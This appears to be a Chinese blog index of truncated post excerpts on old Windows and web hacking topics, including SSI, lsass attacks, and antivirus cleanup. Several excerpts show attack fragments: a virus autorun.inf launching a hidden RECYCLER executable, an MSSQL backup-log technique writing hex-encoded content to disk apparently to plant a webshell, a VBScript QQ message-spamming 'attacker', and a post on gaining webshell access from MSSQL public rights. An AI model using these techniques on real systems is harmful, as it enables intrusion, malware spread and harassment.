摘要： 我们先来看一份关于SSI的介绍：SSI有什么用? 之所以要扯到ssi，是因为shtml--server-parsed HTML 的首字母缩略词。包含有嵌入式服务器方包含命令的 HTML 文本。在被传送给浏览器之前，服务器会对 SHTML 文档进行完全地读取、分析以及修改。 shtml和asp 有一些相似，以shtml命名的文件里，使用了ssi的一些指令，就像asp中的指令，你可以在SHTML文件中... 阅读全文

摘要： 首先是autorun.inf一般的病毒的Autorun.inf文件内容为[autorun]open=.\RECYCLER\RECYCLER\autorun.exe shell\1=Openshell\1\Command=.\RECYCLER\RECYCLER\autorun.exeshell\2\=Browsershell\2\Command=.\RECYCLER\RECYCLER\autorun... 阅读全文

摘要： Lsass.exe是Windows系统中必不可少的一个进程，属于微软Windows系统中安全机制相关进程。lsass.exe进程主要用于本地安全和登陆策略，同时也管理IP相关安全信息。对lsass.exe进程进行攻击，造成相应的缓冲区溢出，从而解密Windows系统中相关密码的方法一直是黑客们常用的一种手段。但是，由于lsass.exe进程属于Windows系统核心进程，所以对lsass.exe进... 阅读全文

摘要： alter database Northwind set RECOVERY FULL--create table cmd (a image)--backup log Northwind to disk = 'c:\cmd1' with init--insert into cmd (a) values (0x323C25402050616765204C616E67756167653D224A73... 阅读全文

摘要： dim a,b,ctrctr=0a=inputbox("请输入你要攻击的语言，目前只支持英文","包子QQ自动攻击器")b=inputbox("请输入你要攻击的次数","包子QQ自动攻击器")b=b+0do while ctr<bset wshshell=CreateObject("wscript.shell")wscript.sleep 500wshshell.sendkeys "CoDz By... 阅读全文

摘要： // 允许程序在 register_globals = off 的环境下工作$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');if ($onoff != 1) { @extract($_POST, EXTR_SKIP); @extract($_G... 阅读全文

摘要： 提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法建表,我在这里矫正一下其实public是可以建表的~呵呵,使这些存储过程能利用上,看下面的代码吧--建立一个临... 阅读全文

摘要： @echo offclsrem code by ALLyeSNO:echo 给你讲个笑话：echo.set str=...................作业做了很久，顺手打开收音机，一个温柔的声音传出：“…如果肤色分红，脸上的绒毛细嫩柔软，那么说明很健康…” 听到这里，包子忍不住摸了自己的脸，对镜顾盼，再笑一笑，样子健康可爱。 这时，又听播音员说道：“好，听众朋友，这次我们的《养猪知识讲座》就到... 阅读全文

摘要： 今天装了个AntiARP防火墙，用完卸载后发现，每次开机时都会提示，发现什么新硬件要驱动,真的很烦，搞来搞去才发现是AntiARP没卸载干净，刚到网上找了个方法，拿来和大家分享！1. 进入控制面版，卸载当前已经安装的ARP防火墙。（如果没有就跳过）2. 进入 网上邻居属性页 > 选择网卡属性 > 定位到 "AntiARP Firewall Driver" > 卸载 （如果没有就跳过）3. 进... 阅读全文

摘要： Jeremy Poteet正在观看着他做安全工作的候选人网站上线。就在16分钟后，该网站遭到攻击。但是这个高度受关注的网站巧妙地规避了这些攻击，以及随之而来的其他攻击，因为Proteet已经预见到会发生此类攻击，并已经做出了对策。他是怎么知道的呢？很简单，他是一个黑客，像黑客一样思考问题，并且知道黑客使用的工具——这是保护公司不被攻击的最有效方法。作为App防御的首席安全官，Poteet这一类黑客... 阅读全文